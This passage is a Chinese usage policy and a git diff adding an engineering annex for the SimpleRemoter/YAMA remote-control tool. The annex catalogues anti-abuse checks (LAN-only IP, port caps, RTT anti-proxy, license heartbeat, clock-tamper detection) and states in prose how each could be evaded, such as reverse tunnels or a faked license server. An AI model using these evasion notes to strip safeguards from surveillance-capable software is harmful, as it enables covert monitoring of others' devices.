> 并销毁您持有的全部副本。
---
## 1. 目的与适用范围
### 1.1 文档目的
本文档(以下简称"本政策")的目的是:
1. 明确本软件(指仓库中所标识的 SimpleRemoter / YAMA 项目,包括其源代码、
编译产物、文档、配置示例与所有衍生分发物,以下统称"本软件")的合法
使用边界;
2. 公开发行方为防止本软件被滥用而内置的技术措施;
3. 在发行方与最终使用方之间划清责任,确保任何越权或违法使用行为的法律
后果由实施该行为的一方独立承担;
4. 作为本软件项目对外的"反滥用与合规姿态"的正式书面证据,可被援引于
任何与本软件被滥用相关的调查、诉讼或行政程序。
### 1.2 适用对象
本政策对下列各方均具有约束力:
- 直接从发行方仓库获取本软件源代码或编译产物的个人 / 实体;
- 通过任何第三方渠道(镜像站点、社区转发、二次发行等)获取本软件的
个人 / 实体;
- 在发行方授权体系内取得"试用口令"或"正式授权"的被授权方;
- 上述各方在其内部组织 / 团队 / 客户处的实际操作人员。
上述各方在本政策中统称为"使用方"。
### 1.3 与其他文档的关系
本政策与本软件附带的下列材料共同构成完整的使用条件:
- 仓库根目录下的 `README.md`(项目简介及法律警告);
- 仓库根目录下的 `LICENSE` 或同等开源许可证文件;
- 发行方在签发"正式授权"时单独签订的授权协议(如有)。
如本政策与上述任一材料的表述发生冲突,以**对发行方更有利、对使用方义务
更严格**的表述为准。这一冲突解决规则的目的,是确保本软件的反滥用立场
不因任何文档表述差异而被削弱。
---
## 2. 术语定义
为便于理解,下列术语在本政策中具有以下含义:
- **"发行方"**:本软件源代码仓库的合法持有人,以及由其明确指定的代理人。
- **"被授权方"**:在发行方授权体系内取得任一档授权(无口令档不构成
显式授权,但仍受本政策约束)的个人或实体。
- **"被管设备"**:使用方利用本软件进行远程访问、监控、控制的目标
计算设备,包括但不限于个人电脑、服务器、移动终端、嵌入式设备。
- **"被管设备相关方"**:被管设备的所有人(拥有该设备物权或处分权的
自然人 / 法人)以及实际使用人(在该设备上工作、存储个人数据、
进行账户登录的自然人)。两者可能为同一人,也可能为不同人。
- **"个人信息"**:以电子或其他方式记录的、与已识别或可识别的自然人
有关的各种信息,含义参照《中华人民共和国个人信息保护法》第四条
及欧盟《通用数据保护条例》GDPR第 4 条第(1)项。
- **"司法辖区"**:与使用方实际部署、运营本软件相关的任何国家或地区
的法律体系,包括使用方住所地、被管设备所在地、被管设备相关方
所在地、相关数据流转或存储所在地。
---
## 3. 软件设计意图与许可使用场景
### 3.1 设计意图
本软件的设计意图是为下列**合法、获明示同意的**使用场景提供技术能力:
| 场景 | 典型形态 | 必要前提 |
|------|---------|---------|
| 个人单机管理 | 自有设备的远程登录、应急自救 | 设备由使用人自有 |
| 内部 IT 运维 | 组织内部对自有设备 / 受雇员同意监控的工作设备进行批量管理 | 组织对设备享有所有权 / 管理权,且对使用人完成合规告知 |
| 授权安全研究 | 渗透测试、红队演练、漏洞研究 | 与目标系统所有方签署书面授权委托 |
| 教学与技术学习 | 在隔离实验环境中学习网络编程、IOCP 模型、远程控制原理 | 实验环境与生产环境完全隔离,无第三方设备介入 |
### 3.2 许可使用场景的共同要件
无论上述哪一种场景,使用方均须同时满足下列要件:
1. **合法权源**:使用方对被管设备享有合法的所有权、管理权或经合法授权
的访问权;
2. **明示同意**:被管设备相关方已就本软件的安装、运行及其将采集 /
传输的所有数据类型,给予事先、明确、可撤回、可追溯的书面同意(含
电子形式);
3. **目的限定**:使用目的限定为前条所列形态,不得超出已告知的范围;
4. **最小必要**:仅使用与目的相符的最小必要功能,不主动启用与目的
无关的采集 / 控制能力;
5. **可审计性**:使用方保留充分的操作日志、授权记录、同意证据,以
备监管核查或事后追溯。
---
## 4. 严禁使用情形
### 4.1 一般性禁止
下列使用情形被本政策**绝对禁止**,不因任何技术可行性或商业便利而例外:
1. **未经授权的访问**:在未取得被管设备所有人或合法管理人事先书面
同意的情况下,对其设备进行访问、监控、控制、信息读取或修改;
2. **隐蔽监控**:以隐蔽、欺骗或诱导方式安装本软件,使被管设备使用人
不知晓本软件正在运行、采集数据或被远程操作;
3. **职场越界监控**:在工作场所对员工实施超出当地劳动法、个人信息
保护法允许范围的监控,包括但不限于个人通讯、私人账户、非工作
时间的活动监控;
4. **未成年人监控**:对未成年人实施未取得其法定监护人完整知情同意的
监控,或在已取得同意的情况下采集 / 传输与监护目的无关的内容;
5. **政府机关 / 关键信息基础设施**:在未取得相应行政许可或安全审查
通过的情况下,将本软件部署于政府机关、关键信息基础设施运营者所
管理的系统;
6. **商业秘密窃取**:用于获取、复制、传输他方拥有所有权或保密权益的
技术信息、经营信息、客户数据;
7. **非法跨境数据传输**:在未完成属地法律所要求的数据出境安全评估、
认证或合同备案的情况下,使用本软件作为传输通道将受管辖数据传输
至境外;
8. **金融、医疗等强监管领域**:在不符合相应行业监管规则(如金融业
外包管理、医疗信息系统等保认证)的情况下,将本软件部署于该等
行业的生产环境;
9. **以骚扰、跟踪、勒索为目的**:用于跟踪特定自然人的行踪、骚扰
通讯、敲诈勒索、网络欺凌或其他对自然人造成精神或财产损害的
行为;
10. **规避执法或监管**:用于隐藏违法证据、对抗执法调查、规避监管
报送义务,或为上述行为提供辅助。
### 4.2 与现行法律体系的对应关系(提示性,非详尽)
下列法律法规中的相关条款,与第 4.1 条所列禁止情形可能直接相关。
本提示不构成对法律适用的全面分析,使用方应自行评估并取得专业法律
意见:
- **中华人民共和国法律体系**
- 《刑法》第 285 条(非法侵入计算机信息系统罪、非法获取计算机
信息系统数据罪、非法控制计算机信息系统罪);
- 《刑法》第 286 条(破坏计算机信息系统罪);
- 《刑法》第 286 条之一(拒不履行信息网络安全管理义务罪);
- 《刑法》第 287 条之一、之二(非法利用信息网络罪、帮助信息
网络犯罪活动罪);
- 《网络安全法》第 27 条、第 44 条、第 76 条;
- 《数据安全法》第 32 条、第 51 条;
- 《个人信息保护法》第 13 条、第 17 条、第 23 条、第 38 条、
第 66 条;
- 《关键信息基础设施安全保护条例》。
- **欧盟法律体系**
- 《通用数据保护条例》GDPR第 5、6、7、9、4449、83 条;
- 《网络与信息系统安全指令》NIS2 Directive
- 部分成员国对工作场所监控、电信秘密的特别立法。
- **其他司法辖区**
- 美国 Computer Fraud and Abuse Act (CFAA)
- 美国各州的电子通讯隐私立法、儿童在线隐私保护法COPPA
- 英国 Computer Misuse Act 1990
- 部分国家 / 地区的"出口管制清单"对网络入侵 / 监视类双用途
物项的限制(如 Wassenaar Arrangement 框架下的"intrusion
software"管制)。
---
## 5. 使用方的义务与承诺
使用方在下载、安装或以任何方式使用本软件之时,即被视为对发行方作出
下列各项独立的、可追溯的承诺:
### 5.1 合法性承诺
使用方承诺其使用本软件的目的、方式、范围、对象在所有相关司法辖区下
均不构成对任何法律法规的违反。使用方进一步承诺其已自行评估或委托
专业人士评估前述合法性,不依赖发行方提供的任何材料(包括本政策)
作为最终合法性判断的依据。
### 5.2 同意取得承诺
在每一台被管设备上部署本软件之前,使用方承诺其已取得被管设备相关方
**事先、明确、书面或可等同书面形式**的同意。该同意应至少包含:
- 软件名称及主要功能描述;
- 将采集的数据类型与传输去向;
- 数据保留期限;
- 撤回同意的方式;
- 数据访问、更正、删除等权利的行使路径。
使用方承诺保留上述同意的可追溯证据不少于本软件在该设备上停止运行
**三 (3) 年** 或属地法律规定的更长期限。
### 5.3 不规避承诺
使用方承诺**不通过任何方式**规避、削弱、屏蔽本软件中由发行方设置
的反滥用机制(详见第 6 节),包括但不限于:
- 反编译、二进制 patch、内存注入修改授权校验逻辑
- 通过 hook、API 拦截、虚拟机等手段屏蔽告警弹窗或日志输出;
- 伪造授权服务器响应、本地搭建假冒授权服务器;
- 修改源代码后将"已禁用反滥用机制"的衍生版本对外分发。
任何上述行为本身即构成对本政策的根本违反,且发行方有权将其作为
"使用方明知滥用而仍刻意为之"的证据用于后续追责。
### 5.4 配合调查承诺
使用方承诺,在发行方根据合理依据怀疑其存在违反本政策的行为时,
有义务在合理期限内向发行方提供下列材料供核查:
- 部署本软件的设备清单及其所有人 / 使用人信息;
- 第 5.2 条所述同意取得证据;
- 部署期间的操作日志、配置信息;
- 与第 4 节所列禁止情形之否认陈述。
如使用方在合理期限内拒绝配合或提供虚假材料,发行方有权直接吊销
其授权,并将相关情况报告给有管辖权的执法或监管机关。
### 5.5 损害赔偿承诺
使用方承诺:因其违反本政策而导致发行方面临任何第三方索赔、行政
处罚、刑事调查或声誉损害的,使用方应向发行方提供完整的损害赔偿
indemnification包括但不限于
- 发行方为应对前述事件支出的合理律师费、调查费、公关费;
- 发行方因前述事件被判决或和解承担的赔偿金额;
- 发行方因前述事件遭受的间接经济损失(在属地法律允许范围内)。
---
## 6. 发行方内置的反滥用技术措施
为体现发行方"已采取合理技术措施防止本软件被滥用"的立场,本软件
在源代码层面内置了下列强制性技术机制。这些机制的源代码公开可查,
任何人均可独立验证其存在与运行:
### 6.1 入站连接源 IP 段校验(`LANChecker`
实现位置:`common/LANChecker.h` 中的 `LANChecker` 类。
机制描述:客户端进程周期性扫描本进程的已建立 (ESTABLISHED) 入站
TCP 连接,对每一连接的远端 IP 地址进行私网段校验。任何来源于公网
IP即非 RFC 1918 / RFC 3927 / 回环段)的连接被检出后,立即触发
向终端用户的可见告警。
合规意义:用于在试用模式下封堵"客户端直接从公网接入被管设备"
这一最常见的越权使用形态。
### 6.2 监听端口数量上限(`LANChecker::CheckPortLimit`
实现位置:同上文件。
机制描述:扫描本进程占用的 TCP 监听端口总数,并与当前授权档对应
的上限值比对:
| 授权档 | 上限 |
|--------|------|
| 无口令 | 2 |
| 试用口令 | 20 |
超过上限即触发告警。该机制的目的是防止单台部署被改造为多租户
中转节点。
### 6.3 应用层 RTT 反代理(`LANRttChecker`
实现位置:同上文件。
机制描述:在试用模式下,对每一条控制连接的心跳 RTT 中位数进行
持续监测,超过 25 毫秒阈值并持续若干窗口后触发告警。该机制基于
"光速决定的物理 RTT 不可被代理转发降低"这一不可规避的物理约束,
用于检测"在 LAN 内放置代理 / 反向隧道,源 IP 仍为私网段但实际
经公网转发到外部客户端"这一比 6.1 更隐蔽的越权使用形态。
合规意义:覆盖了"通过反向隧道间接突破 LAN-only 限制"的滥用路径。
### 6.4 授权服务器周期心跳(`AuthTimeoutChecker`
实现位置:同上文件。
机制描述:客户端进程必须周期性回连发行方运营的授权服务器并完成
心跳。长时间无法回连时先告警,超出更长阈值则强制终止进程。
合规意义:
- 防止"仅在初次激活时联网,之后离线长期使用"以规避后续吊销;
- 为发行方在服务器侧吊销违规授权提供下发通道。
### 6.5 措施的可被感知性
上述全部机制均设计为**故意可被终端用户感知**的"告警 / 终止"路径,
而非静默运行。这一设计意图是:让被滥用部署的实例**自我暴露**
便于被管设备相关方、IT 管理员或合规人员及时发现异常并采取行动。
### 6.6 措施的"合理性"声明
发行方声明:上述机制构成在本软件功能范围内**经合理设计、足以使
善意使用方避免越权部署**的技术措施。发行方承认该等措施不能阻止
具备充分技术能力且持有恶意的攻击者通过深度修改源代码、二进制
patch 或独立重新实现等方式予以规避,但该等深度规避行为本身即超
出"使用本软件"的范畴,构成对发行方知识产权与本政策第 5.3 条
不规避承诺的独立违反,相应法律后果由实施方独立承担。
---
## 7. 授权分级与对应限制
| 授权档 | 适用场景 | 强制限制 | 取得方式 |
|--------|---------|---------|---------|
| 无口令 | 个人单机自用 | 监听端口 ≤ 2 | 直接下载使用 |
| 试用口令 | 内部 LAN 设备管理(严禁跨网) | 监听端口 ≤ 20<br>入站连接源 IP 必须为私网段<br>心跳 RTT 中位数 ≤ 25 ms<br>周期性回连授权服务器 | 向发行方申请,提供身份与用途 |
| 正式授权 | 跨网远程业务 | 由签发协议另行约定 | 人工审核签发,须提供正当用途说明 |
正式授权档的取得程序由发行方另行公布,至少包含:
- 申请人身份核验(自然人为身份证件、法人为营业执照或同等文件);
- 用途说明书(部署形态、目标设备规模、数据流向);
- 合规承诺函(书面承诺接受本政策约束);
- 必要时要求出具被管设备相关方同意取得方案。
---
## 8. 发行方责任范围与免责声明
### 8.1 发行方责任的有限性
发行方在本软件项目中的责任范围**仅限于**下列两项:
1. 提供具备本政策第 6 节所述反滥用机制的软件实现;
2. 在签发"正式授权"时进行合理的身份核验与用途说明审查。
发行方**不承担**下列任何责任:
- 不审查使用方的实际部署形态、被管设备的实际归属、被管设备相关方
实际是否同意;
- 不参与使用方的运营、不为使用方采集的任何数据的内容、来源、去向、
保管、删除负责;
- 不对使用方的合规义务履行情况作任何形式的担保、背书或推荐;
- 不对本软件在任何特定司法辖区、特定使用场景下的合法性出具意见。
### 8.2 关于"许可签发"的特别声明
发行方明确声明:**签发任何档次的授权,均不构成对被授权方任何具体
使用方式的背书、推荐、担保、协助或共谋。** 授权签发仅意味着发行方
基于被授权方提交的材料,**初步认为**该方陈述的用途在表面上不属于
本政策第 4 节所列禁止情形;该初步认定不替代被授权方自身的合法性
评估义务,亦不在被授权方实际使用偏离申请陈述时构成发行方的事先
同意。
### 8.3 越权使用后果的归属
被授权方违反本政策从事任何越权或违法使用所造成的全部法律后果(含
但不限于民事赔偿、行政处罚、刑事责任、第三方损害赔偿、声誉损害),
**由被授权方独立承担,与发行方无关**
被授权方在此明确同意:发行方在受到任何与该等越权使用有关的索赔、
通知、调查或诉讼时,被授权方应作为独立责任主体出面应对,并按本
政策第 5.5 条的约定向发行方提供完整的损害赔偿。
### 8.4 软件按"现状"提供的声明
本软件按"现状"AS IS和"现有功能"AS AVAILABLE提供。除属地
强制性法律另有明确规定且不可被合同排除者外,发行方**不就本软件
作出任何形式的明示或默示担保**,包括但不限于:
- 适销性担保;
- 特定用途适用性担保;
- 不侵权担保;
- 软件运行不中断或无错误的担保;
- 反滥用机制能挡住所有形式的攻击或绕过的担保;
- 在任何特定司法辖区下合法可用的担保。
### 8.5 责任上限
在属地强制性法律允许的最大范围内,发行方对使用方的全部责任合计
不得超过下列两者中的较低者:
- 使用方为该次授权实际向发行方支付的费用(如有);
- 等值于 100 欧元 / 等值于 800 元人民币 / 等值于 100 美元的金额,
以发行方所在司法辖区货币为准。
发行方在任何情况下均不对下列损失承担责任(即便已被告知该等损失
之可能性):
- 间接损失、特殊损失、惩罚性损失、附带损失;
- 利润损失、营业中断损失、商誉损失;
- 数据丢失或数据损坏;
- 第三方索赔。
---
## 9. 违规处置
### 9.1 单方处置权
发行方在合理依据下怀疑使用方存在违反本政策的行为时,有权在不另行
通知的情况下采取下列任一或全部措施:
1. 立即吊销该使用方的现有授权;
2. 在授权服务器侧将该使用方的标识 / 设备指纹列入黑名单;
3. 向有管辖权的执法、监管或司法机关主动报告并提交相关证据;
4. 在公开仓库的发行说明、公告或官网中公示违规事实(在符合属地
隐私与名誉权法律的前提下)。
### 9.2 配合执法
发行方在收到任何有管辖权的执法机关、监管机关或司法机关合法发出
的协查函、调取通知、调查令时,将依法配合,包括但不限于:
- 提交授权签发记录;
- 提交授权服务器侧的心跳、IP 等技术日志(在发行方实际持有的范围内);
- 在依法保密义务允许的范围内,向相关执法机关说明本软件的设计意图
与反滥用机制。
被授权方对授权协议的接受,即视为对发行方上述配合执法行为的明示
同意,不构成对其商业秘密、个人信息或合同义务的违反。
---
## 10. 数据保护与隐私
### 10.1 发行方不接触使用方采集的数据
发行方设计本软件时遵循"控制平面(授权 / 心跳)与数据平面(远程
桌面 / 文件传输 / 屏幕采集)严格分离"原则。**发行方运营的授权
服务器不接收、不存储、不转发使用方通过本软件采集或传输的任何
被管设备数据。** 该等数据仅在使用方自身的部署架构中流转,由使用
方独立承担"数据控制者"或"数据处理者"在属地法律下的全部义务。
### 10.2 使用方作为独立数据控制者
使用方在使用本软件采集、存储、传输、处理被管设备相关方的任何
个人信息时,**单独构成属地数据保护法下的数据控制者**GDPR
意义上的 Controller或《个人信息保护法》意义上的"个人信息处理
者"),独立承担下列义务:
- 合法性基础的取得与记录;
- 告知与透明度义务;
- 数据主体权利响应(访问、更正、删除、可携带、反对自动决策等);
- 数据安全保障与泄露通知;
- 跨境传输的合规路径选择;
- 留存与删除政策;
- 必要时的数据保护影响评估DPIA
### 10.3 不就属地合规义务作具体指引
发行方因不掌握使用方的具体部署形态、被管设备类型、被管数据敏感
程度,故无法、亦不就使用方在任何具体司法辖区下的合规义务履行
作出具体指引。使用方应自行委托专业律师 / 数据保护官DPO评估
并完成属地合规。
---
## 11. 出口管制与制裁合规
### 11.1 双用途物项的属性提示
本软件具备远程访问、屏幕采集、键盘记录、文件传输等技术功能,
在部分司法辖区可能构成"双用途物项"dual-use item受出口
管制法律约束(如 Wassenaar Arrangement 框架下"intrusion software"
管制类目、欧盟 Regulation (EU) 2021/821、中国《两用物项出口管制
条例》等)。
### 11.2 使用方的自查义务
使用方在跨境传输、部署或使用本软件前,应自行评估其行为是否触发
属地的出口管制、制裁清单(含联合国制裁、美国 OFAC 制裁、欧盟
限制性措施清单、中国不可靠实体清单等)申报或许可义务,并独立
承担合规责任。发行方不就该等评估提供任何意见或保证。
### 11.3 制裁实体禁用
使用方不得将本软件出口、再出口、转让、提供给任何属地法律所列的
制裁对象(自然人 / 法人 / 国家 / 地区),亦不得用于该等制裁对象
所控制或所在的设施。
---
## 12. 知识产权与开源声明
### 12.1 著作权归属
本软件的源代码与文档之著作权归发行方所有,并按仓库根目录
`LICENSE` 文件所标识的开源许可证(如 MIT 许可证)对外许可。
该开源许可证授予的权利与本政策对滥用行为的禁止**并行不悖**
开源许可证授予的修改、再分发、商用等权利,不构成对违法 / 越权
使用之豁免。
### 12.2 衍生版本的合规义务传递
任何对本软件源代码进行修改后再行分发的人员("再分发者"),有
义务在其分发物中**完整保留**
- 本政策的全文(或对其的不可断链 URL 引用);
- 第 6 节所列反滥用技术措施的完整源代码与运行行为;
- 仓库根目录 `LICENSE` 文件。
任何在再分发物中**移除、削弱或禁用**前述任一项的行为,构成对发行方
著作权与本政策的双重违反,发行方保留追究责任的全部权利。
---
## 13. 适用法律与争议解决
### 13.1 适用法律
本政策的解释、效力及与本政策有关的争议,**适用发行方在仓库联系
方式中所披露之住所地的法律**。前述住所地以仓库元数据README.md、
作者声明等)所披露者为准;如发行方未明确披露住所地,则以发行方
最新一次公开发布行为发生时其 IP 地址或运营主体注册地所在司法辖区
为准。
### 13.2 争议解决方式
因本政策引起或与本政策有关的任何争议,双方应首先协商解决;协商
不成的,**任一方均有权将争议提交至发行方住所地有管辖权的法院诉讼
解决**。使用方在此明示放弃对前述法院管辖权的任何异议(含不方便
法院抗辩 forum non conveniens
### 13.3 集体诉讼放弃
在属地强制性法律允许的范围内,使用方明确放弃以集体诉讼、集团诉讼
class action或代表人诉讼形式针对发行方主张权利的资格。使用方
对发行方的主张应仅以个人名义提出。
---
## 14. 文档优先级与变更
### 14.1 文档优先级
本政策与本软件附带 / 关联的其他材料发生冲突时,按下列顺序确定
优先级(顺序在前者优先):
1. 发行方为正式授权另行签订的书面授权协议;
2. **本政策**
3. 仓库根目录 `LICENSE` 文件中与责任划分有关的条款;
4. `README.md` 及其他说明性文档。
但本政策第 1.3 条之"对发行方更有利、对使用方义务更严格"的冲突
解决规则,作为**最高优先级**适用。
### 14.2 文档变更
发行方有权随时更新本政策。更新后的版本自其在仓库公开发布之时起
对所有自该时点之后获取本软件的人员生效;对在更新前已获取本软件
但在更新后继续使用的人员,自其首次升级 / 重新拉取仓库代码或心跳
回连授权服务器之时起生效。
使用方有义务在每次升级或重新部署本软件前,检查仓库中本政策的
最新版本。继续使用即视为接受更新后的版本。
---
## 15. 文档可分割性
本政策任何一条因任何原因被有管辖权的法院或仲裁机构认定为无效、
不可执行或违反公共秩序的,**不影响本政策其他条款的效力**。被
认定无效的条款应在最大可能保留发行方原意的前提下,被替换为
最接近原意且属合法的条款。
---
## 16. 联系方式
如就本政策内容、授权申请、违规举报或合规疑问需要与发行方沟通,
请通过仓库 `README.md` 中所披露的联系渠道联系发行方。发行方
对所有联系信息按其惯例处理,**对联系行为本身不构成任何形式的
咨询关系或法律意见关系**。
---
## 附录 A使用方合规自检清单建议
使用方在每次新部署本软件前,建议自行核对下列事项。本清单仅供
参考,不替代专业法律意见:
- [ ] 我对所有被管设备享有合法的所有权或管理权
- [ ] 我已就本软件的安装、运行及数据采集取得每一名被管设备使用人的事先书面同意
- [ ] 我已书面记录并保存上述同意,并制定了 ≥ 3 年的保管期限
- [ ] 我的使用目的限定在本政策第 3.1 条所列许可场景之内
- [ ] 我不在工作场所对员工实施超出当地劳动法允许范围的监控
- [ ] 我不对未成年人实施未取得监护人完整同意的监控
- [ ] 我不在政府机关 / 关键信息基础设施部署本软件,或已取得相应许可
- [ ] 我已评估属地《数据保护法》/ GDPR / 个人信息保护法下的数据控制者义务,并已设计相应制度
- [ ] 如涉跨境数据传输,我已完成属地法律所要求的合规路径
- [ ] 我未对本软件源代码作任何削弱反滥用机制的修改
- [ ] 我已为本次部署留存完整的操作日志、配置记录与授权链证据
- [ ] 我理解并同意发行方在合理怀疑时的单方吊销权与配合执法权
---
## 附录 B发行方反滥用立场要点用于对外引用
如有第三方(含但不限于潜在客户、合规审查方、媒体、监管机关)就
发行方对滥用行为的立场提出询问,可援引下列要点:
1. **明确反对滥用**:发行方在 README、本政策、源代码注释中均明确
反对将本软件用于任何未授权访问、隐蔽监控、商业秘密窃取等违法
违规用途。
2. **内置技术措施**:发行方在源代码层面内置了至少四项独立的反滥用
技术机制IP 段校验、端口数限制、RTT 反代理、授权心跳),使
善意使用方难以无意中越权部署。
3. **分级授权**:发行方按"无口令 / 试用 / 正式"三档管理能力开放,
高风险的跨网能力仅向通过人工审核的正式授权方开放。
4. **不接触数据**:发行方运营的授权服务器仅承担授权与心跳,不接触、
不存储使用方通过本软件采集的任何被管设备数据。
5. **配合执法**:发行方在收到合法协查请求时依法配合,提交其实际
持有的授权与心跳记录。
6. **保留处置权**:发行方对存在违规迹象的授权方保留即时吊销权与
黑名单处置权,相应授权协议条款已对此作出明示约定。
---
**文档结束 / END OF DOCUMENT**

244
docs/Compliance_TechnicalMeasures.md Normal file
View File

@@ -0,0 +1,244 @@
# 反滥用技术措施清单(技术证据链)
> **文档版本**1.0
> **维护范围**:本仓库 `common/` `client/` `server/` 三个目录中所有与"反滥用 / 合规执法"
> 相关的代码模块。
> **文档定位**:本文档是 [`Compliance_AntiAbuse.md`](Compliance_AntiAbuse.md) 第 6 节
> "发行方内置的反滥用技术措施"的**工程实现附表**。政策口径以 `Compliance_AntiAbuse.md` 为准;
> 本文档仅就"具体代码在哪、为什么这样设计、目前的已知局限"做工程化登记。
> **受众**:本仓库的维护者、合规审查方、独立验证人员。
---
## 关于本文档
本仓库自起步即声明"试用版仅供 LAN 内自用,不得跨网",并明确反对任何未授权访问、
隐蔽监控、商业秘密窃取等违法用途(见 [`README_EN.md`](../README_EN.md) /
[`ReadMe.md`](../ReadMe.md) / [`Compliance_AntiAbuse.md`](Compliance_AntiAbuse.md))。
此声明若仅停留在文字层面,其证明力有限。为此发行方在源代码层面陆续构筑多道
**可被独立验证**的技术屏障,并将其引入证据链以备:
1. 监管核查时举证"已尽合理技术措施";
2. 第三方合规审计时提供可直接 review 的代码位置;
3. 后续维护者修改这些文件时识别"哪些行为不能被弱化"。
本文档的每一项措施都给出:
- **源代码位置**(精确到文件 + 函数 / 类,不带行号 —— 行号随代码漂移);
- **机制摘要**(一段话讲清楚做什么);
- **设计动机**(为什么需要这一层、防的是哪类滥用形态);
- **已知局限**(不夸大宣传,明示哪些场景挡不住)。
---
## 1. 当前生效的技术措施
### 1.1 入站连接源 IP 段校验
| 项目 | 内容 |
| --- | --- |
| 源代码 | [`common/LANChecker.h`](../common/LANChecker.h) `class LANChecker::CheckAndWarn()` |
| 触发位置 | [`client/KernelManager.cpp`](../client/KernelManager.cpp) `AuthKernelManager::OnHeatbeatResponse` 的 trial 分支 |
| 阈值 | 任一入站连接对端 IP 落在公网段(非 RFC 1918 / RFC 3927 / 回环段)即触发 |
| 触发动作 | 终端用户可见 `MessageBox` 告警(一次性 latch |
| 设计动机 | 封堵"试用版被直接挂到公网"这一最常见、技术门槛最低的越权部署 |
| 已知局限 | 攻击者在 LAN 内放置反向代理 / 隧道时,对端 IP 仍呈私网段 → 漏检 → 由 [1.3 RTT 反代理](#13-应用层-rtt-反代理) 兜底 |
### 1.2 监听端口数量上限
| 项目 | 内容 |
| --- | --- |
| 源代码 | [`common/LANChecker.h`](../common/LANChecker.h) `LANChecker::CheckPortLimit(int maxPorts)` |
| 触发位置 | 同 1.1trial 分支调用 `CheckPortLimit(2)` |
| 阈值 | 试用:≤ 2 个监听端口;无口令:≤ 2 个 |
| 触发动作 | 终端用户可见告警 |
| 设计动机 | 防止单台试用部署被改造为多租户中转节点 / 公网代理出口 |
| 已知局限 | 仅扫描本进程 PID 的监听端口;攻击者另起辅助进程在同机做端口转发可绕过,但攻击成本已上升,且会被其他机制(如 1.3)侧面捕获 |
### 1.3 应用层 RTT 反代理
| 项目 | 内容 |
| --- | --- |
| 源代码 | [`common/LANChecker.h`](../common/LANChecker.h) `class LANRttChecker` |
| 触发位置 | [`client/KernelManager.cpp`](../client/KernelManager.cpp) `CKernelManager::OnHeatbeatResponse`(自 commit `4279e79` 起从 `AuthKernelManager` 迁至此处,使采样源从"客户端到授权服务器"变为"客户端到主控服务器",更精确反映滥用链路) |
| 启停 | 由主控通过 `MasterSettings.IsTrail` 字段下发;试用主控 → 开,已授权主控 → 关 |
| 阈值参数 | 25 ms 中位数 / 滑窗 10 / 收敛跳过 5 / 持续超阈 3 次(最快触发 ≥ 150 秒) |
| 触发动作 | 终端用户可见告警(一次性 latch进程生命周期内不再重弹 |
| 设计动机 | 1.1 的物理盲区补丁:光速决定的真实 RTT 不可被代理转发降低,能识别"源 IP 看似私网、实际经公网中转"的反向隧道部署 |
| 已知局限 | 攻击者自有公网 IP 且与"客户"同城同 ISP 时,物理 RTT 可低于阈值 → 漏检。该残留盲区已在 [`common/LANChecker.h`](../common/LANChecker.h) `class LANRttChecker` 的头部注释中明示,并标注"需叠加同源 IP 多 ClientID 行为信号做双因素判定" |
### 1.4 授权服务器周期心跳与超时熔断
| 项目 | 内容 |
| --- | --- |
| 源代码 | [`common/LANChecker.h`](../common/LANChecker.h) `class AuthTimeoutChecker` |
| 触发位置 | [`client/KernelManager.cpp`](../client/KernelManager.cpp) `AuthKernelManager` 心跳循环;`ResetTimer()` 在每次 ACK 到达时被调 |
| 阈值 | DEBUG 30s 警告RELEASE 300s 警告;后续超时阈值由 `AuthTimeoutChecker::Check` 控制 |
| 触发动作 | 警告期:可见 `MessageBox`;终态:进程退出 |
| 设计动机 | 防止"仅在初次激活时联网、之后离线长期使用"以规避吊销;同时为发行方在授权服务器侧吊销违规授权提供下发通道 |
| 已知局限 | 攻击者搭建假冒授权服务器并做 DNS / hosts 劫持可绕过;但属本政策 [`Compliance_AntiAbuse.md` § 5.3](Compliance_AntiAbuse.md) 明示禁止之"伪造授权服务器响应"行为,已转入法律风险 |
### 1.5 服务端硬性并发连接上限
| 项目 | 内容 |
| --- | --- |
| 源代码 | [`server/2015Remote/2015RemoteDlg.cpp`](../server/2015Remote/2015RemoteDlg.cpp) `CMy2015RemoteDlg` 构造、`OnInitDialog``OnPasswordCheck` 三处 |
| 机制 | `m_nMaxConnection = 2` 是初始默认;`IsPwdHashValid()``CheckValid(-1)` 失败时强制重置为 2 并 `UpdateMaxConnection(2)` |
| 设计动机 | 未授权主控的"硬天花板"。客户端校验代码可能被重打包绕过,但 TCP / UDP 服务器在并发数超限时直接拒绝新连接,是难以从客户端侧绕开的服务端策略 |
| 已知局限 | 未授权主控的运营者若直接修改服务端二进制以解除上限,已构成对政策 [`Compliance_AntiAbuse.md` § 5.3](Compliance_AntiAbuse.md) 的根本违反 |
### 1.6 系统时钟篡改检测
| 项目 | 内容 |
| --- | --- |
| 源代码 | [`common/DateVerify.h`](../common/DateVerify.h) `class DateVerify` |
| 触发位置 | [`client/KernelManager.cpp`](../client/KernelManager.cpp) `AuthKernelManager::OnHeatbeatResponse` 中授权分支 |
| 机制 | 客户端通过多个公共 NTP 源(阿里云 / 腾讯 / 清华 TUNA / 港澳台 / 全球池等共 11 个,按地理优先级)核对系统时间;时间被回拨用以延长试用 → `TerminateProcess(0xDEAD0001)` |
| 设计动机 | 防止用户修改系统时间利用早期试用授权码或绕过时间相关的授权约束 |
| 已知局限 | 出网完全被阻断时无法核对 NTP该情形下与 1.4 共同作用——长时间无 NTP / 无授权心跳同时存在时进程会被自然终止 |
### 1.7 子连接身份校验
| 项目 | 内容 |
| --- | --- |
| 源代码 | [`server/2015Remote/Server.h`](../server/2015Remote/Server.h) `CONTEXT_OBJECT::m_bAuthenticated`;触发于 `TOKEN_CONN_AUTH` 处理路径 |
| 机制 | 主连接走 `TOKEN_LOGIN`;屏幕 / 文件 / 键盘等子连接走 `TOKEN_CONN_AUTH`,连入后必须在握手阶段提交可校验凭证;当前阶段为"宽容验证"模式,仅打标记,为后续收紧策略保留入口 |
| 设计动机 | 防止攻击者绕过主连接直接连入子连接通道复用既有 ClientID 的会话 |
| 已知局限 | 当前为宽容模式(未通过仍接受),仅作为标记。收紧时机待定,将在新增 commit 中说明 |
### 1.8 主控授权状态下发
| 项目 | 内容 |
| --- | --- |
| 源代码 | [`common/commands.h`](../common/commands.h) `struct MasterSettings``Authorized` / `IsTrail` 字段;服务端 [`server/2015Remote/2015RemoteDlg.cpp`](../server/2015Remote/2015RemoteDlg.cpp) `CMy2015RemoteDlg::OnInitDialog` 中填充 |
| 机制 | 服务端在客户端注册后将自己的"授权 / 试用"状态写入 `MasterSettings` 下发;客户端在 [`client/KernelManager.cpp`](../client/KernelManager.cpp) `CMD_MASTERSETTING` 分支接收,据此决定是否启用 [1.3 RTT 反代理](#13-应用层-rtt-反代理) |
